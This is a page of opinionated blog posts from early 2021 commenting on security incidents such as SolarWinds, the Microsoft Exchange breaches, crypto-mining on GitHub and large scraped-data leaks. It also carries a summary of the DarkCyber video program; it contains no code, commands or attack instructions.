GitHub: Amusing Security Management
April 8, 2021
I got a kick out of “GitHub Investigating Crypto-Mining Campaign Abusing Its Server Infrastructure.” I am not sure if the write up is spot on, but it is entertaining to think about Microsoft’s security systems struggling to identify an unwanted service running in GitHub. The write up asserts:
Code-hosting service GitHub is actively investigating a series of attacks against its cloud infrastructure that allowed cybercriminals to implant and abuse the company’s servers for illicit crypto-mining operations…
In the wake of the SolarWinds’ and Exchange Server “missteps,” Microsoft has been making noises about the tough time it has dealing with bad actors. I think one MSFT big dog said there were 1,000 hackers attacking the company.
The main idea is that attackers allegedly mine cryptocurrency on GitHub’s own servers.
This is post SolarWinds and Exchange Server “missteps”, right?
What’s the problem with cyber security systems that monitoring real time threats and uncertified processes?
Oh, I forgot. These aggressively marketed cyber systems still don’t work it seems.
Stephen E Arnold, April 8, 2021
Facebook and Microsoft: Communing with the Spirit of Security
April 7, 2021
Two apparently unrelated actions by bad actors. Two paragons of user security. Two. Count ‘em.
The first incident is summarized in “Huge Facebook Leak That Contains Information about 500 Million People Came from Abuse of Contacts Tool, Company Says.” The main point is that flawed software and bad actors were responsible. But 500 million. Where is Alex Stamos when Facebook needs guru-grade security to zoom into a challenge?
The second incident is explained in “Half a Billion LinkedIn Users Have Scraped Data Sold Online.” Microsoft, the creator of the super useful Defender security system, owns LinkedIn. (How is that migration to Azure coming along?) Microsoft has been a very minor character in the great works of 2021. These are, of course, The Taming of SolarWinds and The Rape of Exchange Server.
Now what’s my point. I think when one adds 500 million and 500 million the result is a lot of people. Assume 25 percent overlap. Well, that’s still a lot of people’s information which has taken wing.
Indifference? Carelessness? Cluelessness? A lack of governance? I would suggest that a combination of charming personal characteristics makes those responsible individuals one can trust with sensitive information.
Yep, trust and credibility. Important.
Stephen E Arnold, April 7, 2021
DarkCyber for April 6, 2021, Now Available
April 6, 2021
DarkCyber is a twice-a-month video news program about the Dark Web, cyber crime, and lesser known Internet services. You can view the program at this link.
This program covers five stories:
- Banjo, founded by a controversial figure, has been given an overhaul. There’s new management and a new name. The challenge? Turn the off tune Banjo into a sweet revenue song.
- The Dark Web is not a hot bed of innovation. In fact, it’s stagnant, and law enforcement has figured out its technology and is pursuing persons of interest. A “new” Dark Web-like datasphere is now emerging. Robust encrypted messaging apps allow bad actors to make deals, pay for goods and services, and locate fellow travelers more easily and quickly than ever before.
- User tracking is a generator of high value information. Some believe that user tracking is benign or nothing about which to worry. That’s not exactly the situation when third-party and primary data are gathered, cross-correlated, and analyzed. Finding an insider who can be compromised has never been easier.
- New cyber crime reports are flowing in the aftermath of the Solarwinds’ and Microsoft Exchange Server fiascos. What’s interesting that two of these reports reveal information which provides useful insight into what the bad actors did to compromise thousands of systems.
- The final story reports about the world’s first drone which makes it possible for law enforcement and intelligence operatives to conduct a video conference with a bad actor near the drone. The innovative device can also smash through tempered glass to gather information about persons of interest.
DarkCyber is produced by Stephen E Arnold. The program is a production of Beyond Search and Arnold Information Technology. Mr. Arnold is the author of CyberOSINT and The Dark Web Notebook. He will be lecturing at the 2021 National Cyber Crime Conference.
Kenny Toth, April 6, 2021
Solarwinds: Making Security a Priority. After the Barn Burned and Running in the Crime Derby
March 31, 2021
I read a remarkable write up called “SolarWinds CEO Gives Chief Security Officer Authority and Air Cover to Make Software Security a Priority.” The article is notable for the information omitted. Here’s a passage I noted:
He created a cybersecurity committee for the board that includes him and two sitting board members. He also said that he has given the company’s chief security officer the power to stop any software release if necessary to address security concerns.
A security committee. Will the group produce a security solution which is elegant, effective, and able to restore trust?
The write up identifies the causes of security breaches. These are managerial missteps. Obviously SolarWinds believes a committee is the optimal way to deal with wonky management by those with an eye of the bottom line, bonuses, and a responsibility-free tenure as top dog.
The technical causes are not really causes. Sorry, but phishing is not a cause. Phishing is a method implemented because employees have inadequate training and the organizations employing these people drop the ball in setting up a defensible perimeter.
Why is this remarkable? Misdirection, blame shifting, and a belief a committee can overcome MBA thinking, compensation incentives, and what I call a high school science club sense of exceptionalism.
Stephen E Arnold, March 31, 2021
MSFT Exchange Excitement: Another Jolt of Info
March 30, 2021
I read “Exchange Server Attacks: Microsoft Shares Intelligence on Post-Compromise Activities.” Interesting, weeks, maybe longer since what one of my analysts described as another digital Chernobyl, have passed without much substantive information.
This “real” news story reports:
Microsoft is raising an alarm over potential follow-on attacks targeting already compromised Exchange servers, especially if the attackers used web shell scripts to gain persistence on the server, or where the attacker stole credentials during earlier attacks.
Interesting. A massive attack which may have distributed malware, possibly as yet undetected, poses a risk. That’s good to know.
This statement attributed to Microsoft is intriguing as well:
In a new blog post, Microsoft reiterated its warning that “patching a system does not necessarily remove the access of the attacker”.
Does this mean that Microsoft’s remediation is not fixing the “problem”? What sorts of malware could be lurking? Microsoft provides some measured answers to this particular question in “Analyzing Attacks Taking Advantage of the Exchange Server Vulnerabilities”?
But the problem is that Microsoft’s foundational software build and deploy business process seems to be insecure.
Dribs and dabs of the consequences of a major security breach is PR and hand waving, not actions which I craved.
Stephen E Arnold, March 30, 2021
Prodaft: Chasing the Bad Actors of SolarWinds
March 29, 2021
I read “Swiss Firm Says It Accessed SolarWinds Attackers’ Servers.” The idea is that the cyber security outfit explored the intermediary servers employed by the SolarWinds’ bad actors. The result was a successful penetration of some of these systems. The result? Prodaft, according to the report, has learned that “these attackers continue to target large corporations and public institutions worldwide.” The targets? The US and Europe.
Furthermore, the attackers have been given the handle “SilverFish Group.” One discovery is explained this way:
[The attackers have] designed an unprecedented malware detection sandbox formed by actual enterprise victims, which enables the adversaries to test their malicious payloads on actual live victim servers with different enterprise AV and EDR solutions, further expanding the high success rate of the SilverFish group attacks.
From my vantage point in rural Kentucky, this sounds similar to the methods revealed in the disclosure of the the Hacking Team’s Remote Control System. The approach makes it possible to “spin” malware in a controlled manner across compromised systems.
The main point is that despite the radio silence from certain organizations affected by the month’s long attacks is:
confirmation of the ongoing nature of the attack validates industry concerns. Once attackers establish persistence within an environment, it is difficult to remove them without considerable resources.
Interesting and not particularly reassuring.
Stephen E Arnold, March 29, 2021
The Value of Threat Data: An Interesting Viewpoint
March 29, 2021
Security is not job one in the cyber security business. Making sales and applying technology to offensive cyber actions are more important. Over the past couple of decades, security for users of mainstream enterprise applications and operating systems has been a puppet show. No one wants to make these digital ecosystems too secure; otherwise, it would be more difficult, expensive, and slow to compromise these systems when used by adversaries. This is a viewpoint not widely known by some professionals, even those in the cyber security business. Don’t agree. That’s okay with me. I would invite those who take exception to reflect on the failure of modern cyber security systems, including threat intelligence systems, to prevent SolarWinds and Microsoft Exchange security breaches. Both are reasonably serious, and both illustrate the future of cyber operations for the foreseeable future. Just because the mainstream pundit-verse is not talking about these security breaches does not mean the problem is solved. It is not.
“Threat Data Helps Enterprises Strengthen Security” describes a different point of view. I am not confident that the data in the write up have factored in the very loud signals from the SolarWinds and Microsoft Exchange missteps. Maybe “collapses” is a more appropriate word.
The write up states:
Benefits of threat data feeds include; adding unique data to better inform security (71 percent), increasing preventive blocking to ensure better defense (63 percent), reducing the mean time to detect and remediate an attack (55 percent), and reducing the time spent researching false positives (51 percent). On the downside 56 percent of respondents also say threat feeds deliver data that is often too voluminous or complex to provide timely and actionable intelligence.
Let’s consider these statements.
First, with regard to benefits, knowing about what exactly? The abject failure of the cyber security defenses for the SolarWinds and Microsoft Exchange problems did zero to prevent the attacks. Victims are not 100 percent sure that recently “sanitized” systems are free from backdoors and malware. The fact that more than half of those in the survey believe that getting threat intelligence is good says more about the power of marketing and the need to cyber security professionals to do something to demonstrate to their superiors that they are on the ball. Yeah, reading about Fullz on the Dark Web may be good for a meeting with the boss, but it does and did zero for the recent, global security lapses. Organizations are in a state of engineered vulnerability, and threat intelligence is not going to address that simple fact.
Next, what about the information in the threat feeds. Like the headlines in a supermarket tabloid or a TikTok video, titillation snags attention. The problem, however, is that despite the high powered systems from developers from Herliya to Mountain View, information flows generate a sense of false security.
A single person at FireEye noticed an anomaly. That single person poked around. What did that individual find: Something in a threat feed, a snappy graphic from a $100,000 visualization tool, or specific information about a malware attack? Nope, zippy items and factoids. Links to Dark Web sites add spice.
The write up says:
Each of the organizations surveyed faced an average of 28 cyber attacks in the past two years. On average, respondents say 38 percent of these attacks were not stopped because security teams lacked timely and actionable data. Respondents also report that 50 percent of all attacks can be stopped using timely and actionable intelligence.
SolarWinds went undetected for possibly longer than 18 months. Attacks one knows about are one thing. The painful reality of SolarWinds and Microsoft Exchange breaches are another. Marketing won’t make the reality different.
Stephen E Arnold, March 29, 2021
How about Those Cyber Security Awards? Great in the Wake of SolarWinds and the MSFT Exchange Issues
March 26, 2021
The Cyber Defense Awards, hosted by Cyber Defense Magazine, has released its list of “InfoSec Awards for 2020-Winners.” The introduction reads:
“These InfoSec Awards are in their 8th year and specifically focused on finding innovative infosec players who have a presence in the United States and other countries. With over 3,200 cybersecurity companies worldwide, only a small number – roughly 10% – are highlighted as InfoSec Awards 2020 winners, based upon independent judging and analysis. This year, we’ve continued to expand our coverage of some of our winning Women in Cybersecurity who will be rolled into our annual update, highlighting some of the innovative women helping taking cybersecurity to new heights.”
It is nice that the awards are recognizing the contributions of women in the male dominated field, and the post presents us with an impressive list of companies. However, we note one name seems to be missing—FireEye, the firm whose smart human analyst (non AI infused) actually caught the widespread SolarWinds’ attack. After that debacle, the effects of which the cyber-security community is still unraveling, we wonder whether these awards are justified. Perhaps they should have taken the year off.
Be that as it may, those interested in the cyber security field may want to check out the full list. It and a description of the judges’ approach can be viewed at the link above.
Now the $64 dollar question: How many of these “winners” detected the SolarWinds and Exchange breaches? Choose one: [a] None, [b] Zip, [c] Zero, [d] Nada.
Cynthia Murrell, March 26, 2021
Exchange Servers: Not Out of the Dog House Yet
March 25, 2021
Here’s a chilling statement I spotted in “Microsoft Servers Being Hacked Faster Than Anyone Can Count”:
This free-for-all [Exchange Server] attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic “script kiddies… Because access is so easy, you can assume that majority of these environments have been breached.
The statement is attributed to Antti Laatikainen, senior security consultant at the cyber security firm F-Secure.
Is this accurate?
The ever fascinating digital publication Windows Central ran a story with a headline that offers a different point of view: “Microsoft Says 92% of Exchange Servers Have Been Patched or Mitigated.”
The discussion about these different views raises a number of questions:
- Does Microsoft want to remediate its business processes to make its products and services more secure? (More security means more difficulties for certain government agencies who use security as a way to achieve their objectives.)
- Can security professionals be trusted to identify security problems or issues? (The SolarWinds’ misstep went undetected for months, maybe as much as two years before information about the issue surfaced in a FireEye statement.)
- Can continuous development and update processes deliver acceptable security? (The core business process may exponentially increase the attack surface with each fast cycle change and deployment.)
How secure are “patched” Exchange servers? A very good question indeed.
Stephen E Arnold, March 25, 2021
High Tech Tension: Sparks Visible, Escalation Likely
March 25, 2021
I read Google’s “Our Ongoing Commitment to Supporting Journalism.” The write up is interesting because it seems to be a dig at a couple of other technology giants. The bone of contention is news, specifically, indexing and displaying it.
The write up begins with a remarkable statement:Google has always been committed to providing high-quality and relevant information, and to supporting the news publishers who help create it.
This is a sentence pregnant with baby Googzillas. Note the word “always.” I am not certain that Google is in the “always” business nor am I sure that the company had much commitment. As I recall, when Google News went live, it created some modest conversation. Then Google News was fenced out of the nuclear ad machinery. Over time, Google negotiated and kept on doing what feisty, mom and pop Silicon Valley companies do; namely, keep doing what they want and then ask for forgiveness.
Flash forward to Australia. That country wanted to get money in exchange for Australian news. Google made some growling noises, but in the end the company agreed to pay some money.
Facebook on the other hand resisted, turned off its service, and returned to the Australian negotiating table.
Where was Microsoft in this technical square dance?
Microsoft was a cheerleader for the forces of truth, justice, and the Microsoft way. This Google blog post strikes me as Google’s reminding Microsoft that Google wants to be the new Microsoft. Microsoft has not done itself any favors because the battle lines between these two giants is swathed in the cloud of business war.
Google has mobile devices. Microsoft has the enterprise. Google has the Chromebook. Microsoft has the Surface. And on it goes.
Now Microsoft is on the ropes: SolarWinds, the Exchange glitch, and wonky updates which have required the invention of KIR (an update to remove bad updates).
Microsoft may be a JEDI warrior with the feature-burdened Teams and the military’s go to software PowerPoint. Google knows that every bump and scrape slows the reflexes of the Redmond giant.
Both mom and pop outfits are looking after each firm’s self interests. Fancy words and big ideas are window dressing.
Stephen E Arnold, March 25, 2021
-
- Subscribe to Beyond Search
Feature archive
News archive
-
